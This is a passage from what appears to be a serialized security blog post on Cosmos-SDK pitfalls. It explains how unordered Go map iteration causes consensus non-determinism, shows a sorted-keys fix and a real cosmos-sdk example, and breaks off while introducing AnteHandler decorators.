EmitEntries",{"type":28,"tag":116,"props":76976,"children":76977},{"style":266},[76978],{"type":33,"value":313},{"type":28,"tag":116,"props":76980,"children":76981},{"style":272},[76982],{"type":33,"value":76983},"objectMap",{"type":28,"tag":116,"props":76985,"children":76986},{"style":339},[76987],{"type":33,"value":76934},{"type":28,"tag":116,"props":76989,"children":76990},{"style":266},[76991],{"type":33,"value":844},{"type":28,"tag":116,"props":76993,"children":76994},{"class":245,"line":361},[76995,76999,77003,77007,77011,77015,77020,77025],{"type":28,"tag":116,"props":76996,"children":76997},{"style":260},[76998],{"type":33,"value":2703},{"type":28,"tag":116,"props":77000,"children":77001},{"style":272},[77002],{"type":33,"value":5603},{"type":28,"tag":116,"props":77004,"children":77005},{"style":266},[77006],{"type":33,"value":825},{"type":28,"tag":116,"props":77008,"children":77009},{"style":272},[77010],{"type":33,"value":38773},{"type":28,"tag":116,"props":77012,"children":77013},{"style":370},[77014],{"type":33,"value":76036},{"type":28,"tag":116,"props":77016,"children":77017},{"style":260},[77018],{"type":33,"value":77019}," range",{"type":28,"tag":116,"props":77021,"children":77022},{"style":272},[77023],{"type":33,"value":77024}," objectMap",{"type":28,"tag":116,"props":77026,"children":77027},{"style":266},[77028],{"type":33,"value":1291},{"type":28,"tag":116,"props":77030,"children":77031},{"class":245,"line":387},[77032,77036,77040,77045,77049,77054],{"type":28,"tag":116,"props":77033,"children":77034},{"style":272},[77035],{"type":33,"value":25841},{"type":28,"tag":116,"props":77037,"children":77038},{"style":266},[77039],{"type":33,"value":141},{"type":28,"tag":116,"props":77041,"children":77042},{"style":272},[77043],{"type":33,"value":77044},"EventManager",{"type":28,"tag":116,"props":77046,"children":77047},{"style":266},[77048],{"type":33,"value":141},{"type":28,"tag":116,"props":77050,"children":77051},{"style":282},[77052],{"type":33,"value":77053},"EmitEvent",{"type":28,"tag":116,"props":77055,"children":77056},{"style":266},[77057],{"type":33,"value":3133},{"type":28,"tag":116,"props":77059,"children":77060},{"class":245,"line":400},[77061,77066,77070,77075],{"type":28,"tag":116,"props":77062,"children":77063},{"style":272},[77064],{"type":33,"value":77065},"            sdk",{"type":28,"tag":116,"props":77067,"children":77068},{"style":266},[77069],{"type":33,"value":141},{"type":28,"tag":116,"props":77071,"children":77072},{"style":282},[77073],{"type":33,"value":77074},"NewEvent",{"type":28,"tag":116,"props":77076,"children":77077},{"style":266},[77078],{"type":33,"value":3133},{"type":28,"tag":116,"props":77080,"children":77081},{"class":245,"line":614},[77082,77087],{"type":28,"tag":116,"props":77083,"children":77084},{"style":563},[77085],{"type":33,"value":77086},"                \"MapContext\"",{"type":28,"tag":116,"props":77088,"children":77089},{"style":266},[77090],{"type":33,"value":3178},{"type":28,"tag":116,"props":77092,"children":77093},{"class":245,"line":631},[77094,77099,77103,77108,77112,77116,77120,77124],{"type":28,"tag":116,"props":77095,"children":77096},{"style":272},[77097],{"type":33,"value":77098},"                sdk",{"type":28,"tag":116,"props":77100,"children":77101},{"style":266},[77102],{"type":33,"value":141},{"type":28,"tag":116,"props":77104,"children":77105},{"style":282},[77106],{"type":33,"value":77107},"NewAttribute",{"type":28,"tag":116,"props":77109,"children":77110},{"style":266},[77111],{"type":33,"value":313},{"type":28,"tag":116,"props":77113,"children":77114},{"style":272},[77115],{"type":33,"value":71774},{"type":28,"tag":116,"props":77117,"children":77118},{"style":266},[77119],{"type":33,"value":825},{"type":28,"tag":116,"props":77121,"children":77122},{"style":272},[77123],{"type":33,"value":38773},{"type":28,"tag":116,"props":77125,"children":77126},{"style":266},[77127],{"type":33,"value":6408},{"type":28,"tag":116,"props":77129,"children":77130},{"class":245,"line":665},[77131],{"type":28,"tag":116,"props":77132,"children":77133},{"style":266},[77134],{"type":33,"value":77135},"            )\n",{"type":28,"tag":116,"props":77137,"children":77138},{"class":245,"line":713},[77139],{"type":28,"tag":116,"props":77140,"children":77141},{"style":266},[77142],{"type":33,"value":67941},{"type":28,"tag":116,"props":77144,"children":77145},{"class":245,"line":750},[77146],{"type":28,"tag":116,"props":77147,"children":77148},{"style":266},[77149],{"type":33,"value":3025},{"type":28,"tag":116,"props":77151,"children":77152},{"class":245,"line":779},[77153],{"type":28,"tag":116,"props":77154,"children":77155},{"style":266},[77156],{"type":33,"value":406},{"type":28,"tag":29,"props":77158,"children":77159},{},[77160],{"type":33,"value":77161},"It's important to note that Golang map iterators are unordered by design. As stated below in the Golang documentation citation, running the same code with different validators may result in varying event orders, potentially causing consensus problems.",{"type":28,"tag":107,"props":77163,"children":77164},{},[77165],{"type":28,"tag":29,"props":77166,"children":77167},{},[77168],{"type":33,"value":77169},"When iterating over a map with a range loop, the iteration order is not specified and is not guaranteed to be the same from one iteration to the next.",{"type":28,"tag":29,"props":77171,"children":77172},{},[77173,77175,77180],{"type":33,"value":77174},"To correctly implement iteration orders, developers must explicitly sort the keys of the ",{"type":28,"tag":98,"props":77176,"children":77178},{"className":77177},[],[77179],{"type":33,"value":66722},{"type":33,"value":77181}," and then fetch the values using the sorted key array before emitting them.",{"type":28,"tag":234,"props":77183,"children":77185},{"code":77184,"language":75784,"meta":7,"className":75785,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n    var keys []string\n    for key := range objectMap {\n        keys = append(keys, key)\n    }\n    sort.Strings(keys)\n\n    for _, key := range keys {\n        ctx.EventManager.EmitEvent(\n            sdk.NewEvent(\n                \"MapContext\",\n                sdk.NewAttribute(key, objectMap[key]),\n            )\n        )\n    }\n}\n",[77186],{"type":28,"tag":98,"props":77187,"children":77188},{"__ignoreMap":7},[77189,77220,77227,77254,77274,77301,77337,77344,77373,77380,77415,77442,77461,77472,77516,77523,77530,77537],{"type":28,"tag":116,"props":77190,"children":77191},{"class":245,"line":246},[77192,77196,77200,77204,77208,77212,77216],{"type":28,"tag":116,"props":77193,"children":77194},{"style":376},[77195],{"type":33,"value":32394},{"type":28,"tag":116,"props":77197,"children":77198},{"style":339},[77199],{"type":33,"value":76934},{"type":28,"tag":116,"props":77201,"children":77202},{"style":376},[77203],{"type":33,"value":49290},{"type":28,"tag":116,"props":77205,"children":77206},{"style":266},[77207],{"type":33,"value":347},{"type":28,"tag":116,"props":77209,"children":77210},{"style":339},[77211],{"type":33,"value":29322},{"type":28,"tag":116,"props":77213,"children":77214},{"style":266},[77215],{"type":33,"value":15074},{"type":28,"tag":116,"props":77217,"children":77218},{"style":339},[77219],{"type":33,"value":76955},{"type":28,"tag":116,"props":77221,"children":77222},{"class":245,"line":256},[77223],{"type":28,"tag":116,"props":77224,"children":77225},{"emptyLinePlaceholder":19},[77226],{"type":33,"value":1044},{"type":28,"tag":116,"props":77228,"children":77229},{"class":245,"line":293},[77230,77234,77238,77242,77246,77250],{"type":28,"tag":116,"props":77231,"children":77232},{"style":376},[77233],{"type":33,"value":75920},{"type":28,"tag":116,"props":77235,"children":77236},{"style":282},[77237],{"type":33,"value":76974},{"type":28,"tag":116,"props":77239,"children":77240},{"style":266},[77241],{"type":33,"value":313},{"type":28,"tag":116,"props":77243,"children":77244},{"style":272},[77245],{"type":33,"value":76983},{"type":28,"tag":116,"props":77247,"children":77248},{"style":339},[77249],{"type":33,"value":76934},{"type":28,"tag":116,"props":77251,"children":77252},{"style":266},[77253],{"type":33,"value":844},{"type":28,"tag":116,"props":77255,"children":77256},{"class":245,"line":361},[77257,77262,77266,77270],{"type":28,"tag":116,"props":77258,"children":77259},{"style":376},[77260],{"type":33,"value":77261},"    var",{"type":28,"tag":116,"props":77263,"children":77264},{"style":272},[77265],{"type":33,"value":21043},{"type":28,"tag":116,"props":77267,"children":77268},{"style":266},[77269],{"type":33,"value":75847},{"type":28,"tag":116,"props":77271,"children":77272},{"style":339},[77273],{"type":33,"value":76955},{"type":28,"tag":116,"props":77275,"children":77276},{"class":245,"line":387},[77277,77281,77285,77289,77293,77297],{"type":28,"tag":116,"props":77278,"children":77279},{"style":260},[77280],{"type":33,"value":2703},{"type":28,"tag":116,"props":77282,"children":77283},{"style":272},[77284],{"type":33,"value":5603},{"type":28,"tag":116,"props":77286,"children":77287},{"style":370},[77288],{"type":33,"value":76036},{"type":28,"tag":116,"props":77290,"children":77291},{"style":260},[77292],{"type":33,"value":77019},{"type":28,"tag":116,"props":77294,"children":77295},{"style":272},[77296],{"type":33,"value":77024},{"type":28,"tag":116,"props":77298,"children":77299},{"style":266},[77300],{"type":33,"value":1291},{"type":28,"tag":116,"props":77302,"children":77303},{"class":245,"line":400},[77304,77308,77312,77317,77321,77325,77329,77333],{"type":28,"tag":116,"props":77305,"children":77306},{"style":272},[77307],{"type":33,"value":24986},{"type":28,"tag":116,"props":77309,"children":77310},{"style":370},[77311],{"type":33,"value":2226},{"type":28,"tag":116,"props":77313,"children":77314},{"style":282},[77315],{"type":33,"value":77316}," append",{"type":28,"tag":116,"props":77318,"children":77319},{"style":266},[77320],{"type":33,"value":313},{"type":28,"tag":116,"props":77322,"children":77323},{"style":272},[77324],{"type":33,"value":20646},{"type":28,"tag":116,"props":77326,"children":77327},{"style":266},[77328],{"type":33,"value":825},{"type":28,"tag":116,"props":77330,"children":77331},{"style":272},[77332],{"type":33,"value":71774},{"type":28,"tag":116,"props":77334,"children":77335},{"style":266},[77336],{"type":33,"value":2830},{"type":28,"tag":116,"props":77338,"children":77339},{"class":245,"line":614},[77340],{"type":28,"tag":116,"props":77341,"children":77342},{"style":266},[77343],{"type":33,"value":3025},{"type":28,"tag":116,"props":77345,"children":77346},{"class":245,"line":631},[77347,77352,77356,77361,77365,77369],{"type":28,"tag":116,"props":77348,"children":77349},{"style":272},[77350],{"type":33,"value":77351},"    sort",{"type":28,"tag":116,"props":77353,"children":77354},{"style":266},[77355],{"type":33,"value":141},{"type":28,"tag":116,"props":77357,"children":77358},{"style":282},[77359],{"type":33,"value":77360},"Strings",{"type":28,"tag":116,"props":77362,"children":77363},{"style":266},[77364],{"type":33,"value":313},{"type":28,"tag":116,"props":77366,"children":77367},{"style":272},[77368],{"type":33,"value":20646},{"type":28,"tag":116,"props":77370,"children":77371},{"style":266},[77372],{"type":33,"value":2830},{"type":28,"tag":116,"props":77374,"children":77375},{"class":245,"line":665},[77376],{"type":28,"tag":116,"props":77377,"children":77378},{"emptyLinePlaceholder":19},[77379],{"type":33,"value":1044},{"type":28,"tag":116,"props":77381,"children":77382},{"class":245,"line":713},[77383,77387,77391,77395,77399,77403,77407,77411],{"type":28,"tag":116,"props":77384,"children":77385},{"style":260},[77386],{"type":33,"value":2703},{"type":28,"tag":116,"props":77388,"children":77389},{"style":272},[77390],{"type":33,"value":2708},{"type":28,"tag":116,"props":77392,"children":77393},{"style":266},[77394],{"type":33,"value":825},{"type":28,"tag":116,"props":77396,"children":77397},{"style":272},[77398],{"type":33,"value":71774},{"type":28,"tag":116,"props":77400,"children":77401},{"style":370},[77402],{"type":33,"value":76036},{"type":28,"tag":116,"props":77404,"children":77405},{"style":260},[77406],{"type":33,"value":77019},{"type":28,"tag":116,"props":77408,"children":77409},{"style":272},[77410],{"type":33,"value":21043},{"type":28,"tag":116,"props":77412,"children":77413},{"style":266},[77414],{"type":33,"value":1291},{"type":28,"tag":116,"props":77416,"children":77417},{"class":245,"line":750},[77418,77422,77426,77430,77434,77438],{"type":28,"tag":116,"props":77419,"children":77420},{"style":272},[77421],{"type":33,"value":25841},{"type":28,"tag":116,"props":77423,"children":77424},{"style":266},[77425],{"type":33,"value":141},{"type":28,"tag":116,"props":77427,"children":77428},{"style":272},[77429],{"type":33,"value":77044},{"type":28,"tag":116,"props":77431,"children":77432},{"style":266},[77433],{"type":33,"value":141},{"type":28,"tag":116,"props":77435,"children":77436},{"style":282},[77437],{"type":33,"value":77053},{"type":28,"tag":116,"props":77439,"children":77440},{"style":266},[77441],{"type":33,"value":3133},{"type":28,"tag":116,"props":77443,"children":77444},{"class":245,"line":779},[77445,77449,77453,77457],{"type":28,"tag":116,"props":77446,"children":77447},{"style":272},[77448],{"type":33,"value":77065},{"type":28,"tag":116,"props":77450,"children":77451},{"style":266},[77452],{"type":33,"value":141},{"type":28,"tag":116,"props":77454,"children":77455},{"style":282},[77456],{"type":33,"value":77074},{"type":28,"tag":116,"props":77458,"children":77459},{"style":266},[77460],{"type":33,"value":3133},{"type":28,"tag":116,"props":77462,"children":77463},{"class":245,"line":796},[77464,77468],{"type":28,"tag":116,"props":77465,"children":77466},{"style":563},[77467],{"type":33,"value":77086},{"type":28,"tag":116,"props":77469,"children":77470},{"style":266},[77471],{"type":33,"value":3178},{"type":28,"tag":116,"props":77473,"children":77474},{"class":245,"line":847},[77475,77479,77483,77487,77491,77495,77499,77503,77507,77511],{"type":28,"tag":116,"props":77476,"children":77477},{"style":272},[77478],{"type":33,"value":77098},{"type":28,"tag":116,"props":77480,"children":77481},{"style":266},[77482],{"type":33,"value":141},{"type":28,"tag":116,"props":77484,"children":77485},{"style":282},[77486],{"type":33,"value":77107},{"type":28,"tag":116,"props":77488,"children":77489},{"style":266},[77490],{"type":33,"value":313},{"type":28,"tag":116,"props":77492,"children":77493},{"style":272},[77494],{"type":33,"value":71774},{"type":28,"tag":116,"props":77496,"children":77497},{"style":266},[77498],{"type":33,"value":825},{"type":28,"tag":116,"props":77500,"children":77501},{"style":272},[77502],{"type":33,"value":76983},{"type":28,"tag":116,"props":77504,"children":77505},{"style":266},[77506],{"type":33,"value":347},{"type":28,"tag":116,"props":77508,"children":77509},{"style":272},[77510],{"type":33,"value":71774},{"type":28,"tag":116,"props":77512,"children":77513},{"style":266},[77514],{"type":33,"value":77515},"]),\n",{"type":28,"tag":116,"props":77517,"children":77518},{"class":245,"line":898},[77519],{"type":28,"tag":116,"props":77520,"children":77521},{"style":266},[77522],{"type":33,"value":77135},{"type":28,"tag":116,"props":77524,"children":77525},{"class":245,"line":907},[77526],{"type":28,"tag":116,"props":77527,"children":77528},{"style":266},[77529],{"type":33,"value":67941},{"type":28,"tag":116,"props":77531,"children":77532},{"class":245,"line":981},[77533],{"type":28,"tag":116,"props":77534,"children":77535},{"style":266},[77536],{"type":33,"value":3025},{"type":28,"tag":116,"props":77538,"children":77539},{"class":245,"line":1011},[77540],{"type":28,"tag":116,"props":77541,"children":77542},{"style":266},[77543],{"type":33,"value":406},{"type":28,"tag":29,"props":77545,"children":77546},{},[77547],{"type":33,"value":77548},"The combination of hidden code within external Golang dependencies makes it difficult to avoid language-wise quirks fully. It is crucial to remain vigilant and avoid underestimating the gravity of this lingering bug class.",{"type":28,"tag":75,"props":77550,"children":77552},{"id":77551},"real-world-examples-1",[77553],{"type":33,"value":76309},{"type":28,"tag":29,"props":77555,"children":77556},{},[77557,77559,77564,77566,77572,77574,77580,77582,77588],{"type":33,"value":77558},"Real-world examples of ",{"type":28,"tag":98,"props":77560,"children":77562},{"className":77561},[],[77563],{"type":33,"value":66722},{"type":33,"value":77565}," causing determinism problems can be found ",{"type":28,"tag":87,"props":77567,"children":77570},{"href":77568,"rel":77569},"https://github.com/cosmos/cosmos-sdk/pull/12487",[91],[77571],{"type":33,"value":2039},{"type":33,"value":77573},", specifically, where the result of ",{"type":28,"tag":98,"props":77575,"children":77577},{"className":77576},[],[77578],{"type":33,"value":77579},"buildCommitInfo",{"type":33,"value":77581}," is inconsistent due to iteration over the ",{"type":28,"tag":98,"props":77583,"children":77585},{"className":77584},[],[77586],{"type":33,"value":77587},"rs.stores",{"type":33,"value":77589}," map.",{"type":28,"tag":29,"props":77591,"children":77592},{},[77593],{"type":28,"tag":87,"props":77594,"children":77597},{"href":77595,"rel":77596},"https://github.com/cosmos/cosmos-sdk/blob/55054282d2df794d9a5fe2599ea25473379ebc3d/store/rootmulti/store.go#L909",[91],[77598],{"type":33,"value":76359},{"type":28,"tag":234,"props":77600,"children":77602},{"code":77601,"language":75784,"meta":7,"className":75785,"style":7},"func (rs *Store) buildCommitInfo(\n    version int64\n) *types.CommitInfo {\n    storeInfos := []types.StoreInfo{}\n    for key, store := range rs.stores {\n        if store.GetStoreType() == types.StoreTypeTransient {\n            continue\n        }\n        storeInfos = append(storeInfos, types.StoreInfo{\n            Name:     key.Name(),\n            CommitId: store.LastCommitID(),\n        })\n    }\n    return &types.CommitInfo{\n        Version:    version,\n        StoreInfos: storeInfos,\n    }\n}\n",[77603],{"type":28,"tag":98,"props":77604,"children":77605},{"__ignoreMap":7},[77606,77643,77656,77684,77718,77763,77809,77817,77824,77869,77899,77928,77935,77942,77969,77991,78011,78018],{"type":28,"tag":116,"props":77607,"children":77608},{"class":245,"line":246},[77609,77613,77617,77622,77626,77631,77635,77639],{"type":28,"tag":116,"props":77610,"children":77611},{"style":376},[77612],{"type":33,"value":75920},{"type":28,"tag":116,"props":77614,"children":77615},{"style":266},[77616],{"type":33,"value":269},{"type":28,"tag":116,"props":77618,"children":77619},{"style":272},[77620],{"type":33,"value":77621},"rs ",{"type":28,"tag":116,"props":77623,"children":77624},{"style":370},[77625],{"type":33,"value":4240},{"type":28,"tag":116,"props":77627,"children":77628},{"style":339},[77629],{"type":33,"value":77630},"Store",{"type":28,"tag":116,"props":77632,"children":77633},{"style":266},[77634],{"type":33,"value":1609},{"type":28,"tag":116,"props":77636,"children":77637},{"style":282},[77638],{"type":33,"value":77579},{"type":28,"tag":116,"props":77640,"children":77641},{"style":266},[77642],{"type":33,"value":3133},{"type":28,"tag":116,"props":77644,"children":77645},{"class":245,"line":256},[77646,77651],{"type":28,"tag":116,"props":77647,"children":77648},{"style":272},[77649],{"type":33,"value":77650},"    version",{"type":28,"tag":116,"props":77652,"children":77653},{"style":339},[77654],{"type":33,"value":77655}," int64\n",{"type":28,"tag":116,"props":77657,"children":77658},{"class":245,"line":293},[77659,77663,77667,77671,77675,77680],{"type":28,"tag":116,"props":77660,"children":77661},{"style":266},[77662],{"type":33,"value":1609},{"type":28,"tag":116,"props":77664,"children":77665},{"style":370},[77666],{"type":33,"value":4240},{"type":28,"tag":116,"props":77668,"children":77669},{"style":339},[77670],{"type":33,"value":5430},{"type":28,"tag":116,"props":77672,"children":77673},{"style":266},[77674],{"type":33,"value":141},{"type":28,"tag":116,"props":77676,"children":77677},{"style":339},[77678],{"type":33,"value":77679},"CommitInfo",{"type":28,"tag":116,"props":77681,"children":77682},{"style":266},[77683],{"type":33,"value":1291},{"type":28,"tag":116,"props":77685,"children":77686},{"class":245,"line":361},[77687,77692,77696,77700,77704,77708,77713],{"type":28,"tag":116,"props":77688,"children":77689},{"style":272},[77690],{"type":33,"value":77691},"    storeInfos",{"type":28,"tag":116,"props":77693,"children":77694},{"style":370},[77695],{"type":33,"value":76036},{"type":28,"tag":116,"props":77697,"children":77698},{"style":266},[77699],{"type":33,"value":75847},{"type":28,"tag":116,"props":77701,"children":77702},{"style":339},[77703],{"type":33,"value":5430},{"type":28,"tag":116,"props":77705,"children":77706},{"style":266},[77707],{"type":33,"value":141},{"type":28,"tag":116,"props":77709,"children":77710},{"style":339},[77711],{"type":33,"value":77712},"StoreInfo",{"type":28,"tag":116,"props":77714,"children":77715},{"style":266},[77716],{"type":33,"value":77717},"{}\n",{"type":28,"tag":116,"props":77719,"children":77720},{"class":245,"line":387},[77721,77725,77729,77733,77737,77741,77745,77750,77754,77759],{"type":28,"tag":116,"props":77722,"children":77723},{"style":260},[77724],{"type":33,"value":2703},{"type":28,"tag":116,"props":77726,"children":77727},{"style":272},[77728],{"type":33,"value":5603},{"type":28,"tag":116,"props":77730,"children":77731},{"style":266},[77732],{"type":33,"value":825},{"type":28,"tag":116,"props":77734,"children":77735},{"style":272},[77736],{"type":33,"value":5612},{"type":28,"tag":116,"props":77738,"children":77739},{"style":370},[77740],{"type":33,"value":76036},{"type":28,"tag":116,"props":77742,"children":77743},{"style":260},[77744],{"type":33,"value":77019},{"type":28,"tag":116,"props":77746,"children":77747},{"style":272},[77748],{"type":33,"value":77749}," rs",{"type":28,"tag":116,"props":77751,"children":77752},{"style":266},[77753],{"type":33,"value":141},{"type":28,"tag":116,"props":77755,"children":77756},{"style":272},[77757],{"type":33,"value":77758},"stores",{"type":28,"tag":116,"props":77760,"children":77761},{"style":266},[77762],{"type":33,"value":1291},{"type":28,"tag":116,"props":77764,"children":77765},{"class":245,"line":400},[77766,77770,77774,77778,77783,77787,77791,77796,77800,77805],{"type":28,"tag":116,"props":77767,"children":77768},{"style":260},[77769],{"type":33,"value":2943},{"type":28,"tag":116,"props":77771,"children":77772},{"style":272},[77773],{"type":33,"value":5502},{"type":28,"tag":116,"props":77775,"children":77776},{"style":266},[77777],{"type":33,"value":141},{"type":28,"tag":116,"props":77779,"children":77780},{"style":282},[77781],{"type":33,"value":77782},"GetStoreType",{"type":28,"tag":116,"props":77784,"children":77785},{"style":266},[77786],{"type":33,"value":13709},{"type":28,"tag":116,"props":77788,"children":77789},{"style":370},[77790],{"type":33,"value":2340},{"type":28,"tag":116,"props":77792,"children":77793},{"style":272},[77794],{"type":33,"value":77795}," types",{"type":28,"tag":116,"props":77797,"children":77798},{"style":266},[77799],{"type":33,"value":141},{"type":28,"tag":116,"props":77801,"children":77802},{"style":272},[77803],{"type":33,"value":77804},"StoreTypeTransient",{"type":28,"tag":116,"props":77806,"children":77807},{"style":266},[77808],{"type":33,"value":1291},{"type":28,"tag":116,"props":77810,"children":77811},{"class":245,"line":614},[77812],{"type":28,"tag":116,"props":77813,"children":77814},{"style":260},[77815],{"type":33,"value":77816},"            continue\n",{"type":28,"tag":116,"props":77818,"children":77819},{"class":245,"line":631},[77820],{"type":28,"tag":116,"props":77821,"children":77822},{"style":266},[77823],{"type":33,"value":1954},{"type":28,"tag":116,"props":77825,"children":77826},{"class":245,"line":665},[77827,77832,77836,77840,77844,77849,77853,77857,77861,77865],{"type":28,"tag":116,"props":77828,"children":77829},{"style":272},[77830],{"type":33,"value":77831},"        storeInfos",{"type":28,"tag":116,"props":77833,"children":77834},{"style":370},[77835],{"type":33,"value":2226},{"type":28,"tag":116,"props":77837,"children":77838},{"style":282},[77839],{"type":33,"value":77316},{"type":28,"tag":116,"props":77841,"children":77842},{"style":266},[77843],{"type":33,"value":313},{"type":28,"tag":116,"props":77845,"children":77846},{"style":272},[77847],{"type":33,"value":77848},"storeInfos",{"type":28,"tag":116,"props":77850,"children":77851},{"style":266},[77852],{"type":33,"value":825},{"type":28,"tag":116,"props":77854,"children":77855},{"style":339},[77856],{"type":33,"value":5430},{"type":28,"tag":116,"props":77858,"children":77859},{"style":266},[77860],{"type":33,"value":141},{"type":28,"tag":116,"props":77862,"children":77863},{"style":339},[77864],{"type":33,"value":77712},{"type":28,"tag":116,"props":77866,"children":77867},{"style":266},[77868],{"type":33,"value":10547},{"type":28,"tag":116,"props":77870,"children":77871},{"class":245,"line":713},[77872,77877,77882,77886,77890,77895],{"type":28,"tag":116,"props":77873,"children":77874},{"style":272},[77875],{"type":33,"value":77876},"            Name",{"type":28,"tag":116,"props":77878,"children":77879},{"style":266},[77880],{"type":33,"value":77881},":     ",{"type":28,"tag":116,"props":77883,"children":77884},{"style":272},[77885],{"type":33,"value":71774},{"type":28,"tag":116,"props":77887,"children":77888},{"style":266},[77889],{"type":33,"value":141},{"type":28,"tag":116,"props":77891,"children":77892},{"style":282},[77893],{"type":33,"value":77894},"Name",{"type":28,"tag":116,"props":77896,"children":77897},{"style":266},[77898],{"type":33,"value":3161},{"type":28,"tag":116,"props":77900,"children":77901},{"class":245,"line":750},[77902,77907,77911,77915,77919,77924],{"type":28,"tag":116,"props":77903,"children":77904},{"style":272},[77905],{"type":33,"value":77906},"            CommitId",{"type":28,"tag":116,"props":77908,"children":77909},{"style":266},[77910],{"type":33,"value":14994},{"type":28,"tag":116,"props":77912,"children":77913},{"style":272},[77914],{"type":33,"value":5612},{"type":28,"tag":116,"props":77916,"children":77917},{"style":266},[77918],{"type":33,"value":141},{"type":28,"tag":116,"props":77920,"children":77921},{"style":282},[77922],{"type":33,"value":77923},"LastCommitID",{"type":28,"tag":116,"props":77925,"children":77926},{"style":266},[77927],{"type":33,"value":3161},{"type":28,"tag":116,"props":77929,"children":77930},{"class":245,"line":779},[77931],{"type":28,"tag":116,"props":77932,"children":77933},{"style":266},[77934],{"type":33,"value":67818},{"type":28,"tag":116,"props":77936,"children":77937},{"class":245,"line":796},[77938],{"type":28,"tag":116,"props":77939,"children":77940},{"style":266},[77941],{"type":33,"value":3025},{"type":28,"tag":116,"props":77943,"children":77944},{"class":245,"line":847},[77945,77949,77953,77957,77961,77965],{"type":28,"tag":116,"props":77946,"children":77947},{"style":260},[77948],{"type":33,"value":393},{"type":28,"tag":116,"props":77950,"children":77951},{"style":370},[77952],{"type":33,"value":6813},{"type":28,"tag":116,"props":77954,"children":77955},{"style":339},[77956],{"type":33,"value":5430},{"type":28,"tag":116,"props":77958,"children":77959},{"style":266},[77960],{"type":33,"value":141},{"type":28,"tag":116,"props":77962,"children":77963},{"style":339},[77964],{"type":33,"value":77679},{"type":28,"tag":116,"props":77966,"children":77967},{"style":266},[77968],{"type":33,"value":10547},{"type":28,"tag":116,"props":77970,"children":77971},{"class":245,"line":898},[77972,77977,77982,77987],{"type":28,"tag":116,"props":77973,"children":77974},{"style":272},[77975],{"type":33,"value":77976},"        Version",{"type":28,"tag":116,"props":77978,"children":77979},{"style":266},[77980],{"type":33,"value":77981},":    ",{"type":28,"tag":116,"props":77983,"children":77984},{"style":272},[77985],{"type":33,"value":77986},"version",{"type":28,"tag":116,"props":77988,"children":77989},{"style":266},[77990],{"type":33,"value":3178},{"type":28,"tag":116,"props":77992,"children":77993},{"class":245,"line":907},[77994,77999,78003,78007],{"type":28,"tag":116,"props":77995,"children":77996},{"style":272},[77997],{"type":33,"value":77998},"        StoreInfos",{"type":28,"tag":116,"props":78000,"children":78001},{"style":266},[78002],{"type":33,"value":14994},{"type":28,"tag":116,"props":78004,"children":78005},{"style":272},[78006],{"type":33,"value":77848},{"type":28,"tag":116,"props":78008,"children":78009},{"style":266},[78010],{"type":33,"value":3178},{"type":28,"tag":116,"props":78012,"children":78013},{"class":245,"line":981},[78014],{"type":28,"tag":116,"props":78015,"children":78016},{"style":266},[78017],{"type":33,"value":3025},{"type":28,"tag":116,"props":78019,"children":78020},{"class":245,"line":1011},[78021],{"type":28,"tag":116,"props":78022,"children":78023},{"style":266},[78024],{"type":33,"value":406},{"type":28,"tag":29,"props":78026,"children":78027},{},[78028,78030,78037,78038,78045],{"type":33,"value":78029},"Other factors contributing to determinism issues are the usage of ",{"type":28,"tag":87,"props":78031,"children":78034},{"href":78032,"rel":78033},"https://medium.com/provenanceblockchain/discovering-non-deterministic-behavior-in-provenance-blockchain-and-cosmos-sdk-3b81b87b8698",[91],[78035],{"type":33,"value":78036},"time-sensitive functions",{"type":33,"value":10659},{"type":28,"tag":87,"props":78039,"children":78042},{"href":78040,"rel":78041},"https://github.com/cosmos/cosmos-sdk/issues/16638",[91],[78043],{"type":33,"value":78044},"race conditions",{"type":33,"value":141},{"type":28,"tag":63,"props":78047,"children":78049},{"id":78048},"thou-shalt-not-passor-should-you",[78050],{"type":33,"value":78051},"Thou Shalt Not Pass...Or Should You?",{"type":28,"tag":29,"props":78053,"children":78054},{},[78055,78057,78063,78064,78070],{"type":33,"value":78056},"When developing smart contracts, it is common to delegate certain low-level tasks (such as parsing ",{"type":28,"tag":98,"props":78058,"children":78060},{"className":78059},[],[78061],{"type":33,"value":78062},"msg.value",{"type":33,"value":825},{"type":28,"tag":98,"props":78065,"children":78067},{"className":78066},[],[78068],{"type":33,"value":78069},"msg.sender",{"type":33,"value":78071},", and collecting transaction fees) to the underlying blockchain.",{"type":28,"tag":29,"props":78073,"children":78074},{},[78075,78077,78083,78085,78091],{"type":33,"value":78076},"On Cosmos, there is no blockchain to rely on since it is the L1 itself! To simplify the development of middleware-like functionalities, ",{"type":28,"tag":98,"props":78078,"children":78080},{"className":78079},[],[78081],{"type":33,"value":78082},"Cosmos-SDK",{"type":33,"value":78084}," introduces ",{"type":28,"tag":98,"props":78086,"children":78088},{"className":78087},[],[78089],{"type":33,"value":78090},"AnteHandler",{"type":33,"value":78092}," decorators to help accomplish this. While there are pre-written decorators, all other data extraction from transactions and blockchain states must be carried out by the developers themselves.",{"type":28,"tag":29,"props":78094,"children":78095},{},[78096,78098,78103,78105,78110],{"type":33,"value":78097},"To provide context, let's first understand how an ",{"type":28,"tag":98,"props":78099,"children":78101},{"className":78100},[],[78102],{"type":33,"value":78090},{"type":33,"value":78104}," is processed. Each ",{"type":28,"tag":98,"props":78106,"children":78108},{"className":78107},[],[78109],{"type":33,"value":78090},{"type":33,"value":78111}," is a state transition function that can:",{"type":28,"tag":455,"props":78113,"children":78114},{},[78115,78120],{"type":28,"tag":459,"props":78116,"children":78117},{},[78118],{"type":33,"value":78119},"Transform the block state in relation to transaction and execution context.",{"type":28,"tag":459,"props":78121,"children":78122},{},[78123,78125],{"type":33,"value":78124},"Determine the course of action for the transaction.\n",{"type":28,"tag":455,"props":78126,"children":78127},{},[78128,78139],{"type":28,"tag":459,"props":78129,"children":78130},{},[78131,78133,78138],{"type":33,"value":78132},"Pass the transaction to the next ",{"type":28,"tag":98,"props":78134,"children":78136},{"className":78135},[],[78137],{"type":33,"value":78090},{"type":33,"value":141},{"type":28,"tag":459,"props":78140,"children":78141},{},[78142],{"type":33,"value":78143},"Return error for transaction.",{"type":28,"tag":29,"props":78145,"children":78146},{},[78147,78149,78154],{"type":33,"value":78148},"The bad news is that developing an ",{"type":28,"tag":98,"props":78150,"children":78152},{"className":78151},[],[78153],{"type":33,"value":78090},{"type":33,"value":78155}," is not the easiest task. For instance, let's consider a scenario where we need to ensure all signers involved in a transaction have a balance greater than X at the time of transaction 